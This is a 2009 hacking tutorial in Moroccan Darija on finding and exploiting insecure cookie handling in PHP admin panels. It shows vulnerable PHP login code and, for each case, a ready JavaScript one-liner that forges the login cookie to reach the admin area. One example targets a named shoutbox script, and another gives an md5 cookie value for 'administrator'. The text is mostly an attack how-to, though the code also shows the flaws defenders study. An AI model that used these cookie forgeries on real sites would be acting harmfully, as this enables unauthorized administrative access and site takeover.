|=--------------------------------------------------------------------=| |=-------------=[ Playing with cookies (ST1) (Morocco) ]=-----------=| |=-----------------------=[ 25 February 2009 ]=-----------------------=| |=---------------------=[ By Mountassif Moad ]=---------------------=| |=--------------------------------------------------------------------=| ########### Lwlad leblad o mgharba tal moute ########## ###### Info ###### ########################################################################### [+] [+] Language : Morocco darija [+] [+] By : Mountassif Moad (Stack) [+] [+] Website : www.v4-team.com [+] [+] Date : 2009-02-25 [+] [+] MilHome : http://www.milw0rm.com/author/1331 [+] ########################################################################### ########## Mohtawayate ########## [0x00] - Mo9adima [0x01] - 3ard [0x02] - khatima [0x03] - l3azz l [0x04] - Kridi ####################### [0x00] - Mo9adima ####################### salamo 3laykome lyouma darete liya flekhwa wana ngoule aji ncherho lwlad leblad kifache nektachfo les faille diyale cookies wli tansemiwha Insecure Cookie Handling Vulnerability ktebte dine mo hadchi bdarija abche yfehmo liha rire wlade leblad dinmhome hadouke l9rouda lakhrine li 3la bali w balkome nekarine lkhire alahoma yetlaho ncherho bdarija mayfahmo fiha hta weza :d o li bgha yefheme yet3eleme darija hhhhhh ########## [0x01] - 3ard ########## ----- 1 ----- almohime nebdawe b te9labe fe php code php 1 : if ($_COOKIE["login"] == "OK") { header("location: admin.php"); } else { echo "lekmala diyale la page php " hna le code ti 9eleb wache lam3louma diyale cookies kina menregistri fe l browser diyalke (login=ok) ila l9aha kina ti douze la page admin.php o ila makanche lcookies shihe ti kemel like la page o matatedkholche l admin njerbo 3la mital haye ----- 2 ----- hadi : http://www.milw0rm.com/exploits/5845 telecharger mene hna : http://www.zeldaforums.net/scripts/myshoutpro1.2.zip lmohime ndekhlo l fichier admin.php fe la ligne 37 kayne hade code code php 2 : alor hna tanchoufo beli $admin_cookie=admin_access o kina (if) ya3ni (ila) $admin_cookie == "" - = - admin_access == "" "" = aya haja ola madire wlaou alor hiya admin_access=0 exploit : javascript:document.cookie = "admin_access=0; path=/"; apré matexecuti lexploit radi yekhreje like message You are logged in. Click here to proceed. tekliki o tedkhole admin ----- 3 ----- daba ndouzo l code akhore code php 3 : if ($user == $username && $pass == $password){ setcookie("login", "OK", time()); hna nbaziwe 3la hade star => setcookie("login", "OK", time()); setcookie hadi function fe php ila bghito te9rawe 3liha ici http://fr.php.net/setcookie hade function kathadede aya haja bache tsefetha l cookies w bima ana hna kine kalimate w li homa login & Ok te9dere tkoune rire haka setcookie("login", "OK") lmohime lexploit diyale hadi hta howa sahleeb bhalha bhale li sab9o Exploit: javascript:document.cookie = "login=OK; path=/"; ---- 4 ---- code php 4 : $user=$_POST['username']; $pass=$_POST['password']; $select_admin = mysql_query("SELECT * FROM cms_admin"); while($dati_admin=mysql_fetch_array($select_admin)){ $username=$dati_admin['username']; $password=$dati_admin['password']; } if ($user == $username && $pass == $password){ setcookie("login", $username, time()); hna 9adiya chwiya mrida ncherho hade code setcookie("login", $username, time()); hna tanlahdo beli kine motaghayire $username hade motagahyire $username=username weli howa diyale admin alor bache tekhdeme lina taghra kahsna walaboda ndiro user diyale admin matalane ila user diyale admin = administrator alor lexploit rada tkoune hakda Exploit: javascript:document.cookie = "login=administrator; path=/"; ---- 5 ---- code php 5 : ta9ribane hakda $user=$_POST['username']; $pass=$_POST['password']; $select_admin = mysql_query("SELECT * FROM cms_admin"); while($dati_admin=mysql_fetch_array($select_admin)){ $username=$dati_admin['username']; $password=$dati_admin['password']; } if ($user == $username && $pass == $password){ setcookie("login", md5($username), time()); hade code bhale lcode li f lexample 4 mé hna kine wahede ziyada hiya tachfire b md5 chofou m3ya hade star setcookie("login", md5($username), time()); setcookie chrahnaha login howa smiya li radi tsefete la function setcookie l cookies md5($username) hadi tate3ni l username mchafere b md5 alor ila username amdin hna makanche mchafere b md5 maradiche ndekhlo l la lawha diyale admin o lexploit rada tkoune hakda Exploit: javascript:document.cookie = "login=200ceb26807d6bf99fd6f4f0d1ca54d4; path=/"; administrator = 200ceb26807d6bf99fd6f4f0d1ca54d4 ------------------------------------------------------------------------- ####################### [0x02] - khatima ####################### khedma 3alam ya salam tsenawe wahede video adi ykoune zwiwene une autre methode bache tktachfo insecure cookies ####################### [0x03] - l3azz l ####################### lga3 lmgharba :d khosousane : Houssamix & simo-soft & djekmani & Gor & Simo64 & Sec-alert & issam & ana :d limasriyine lhabayibe : darbate mi9asse haji ------[ 0x04 - kridi ] Author: Mountassif Moad mail: ma3adkome madiro bihe :d site: http://v4-team.com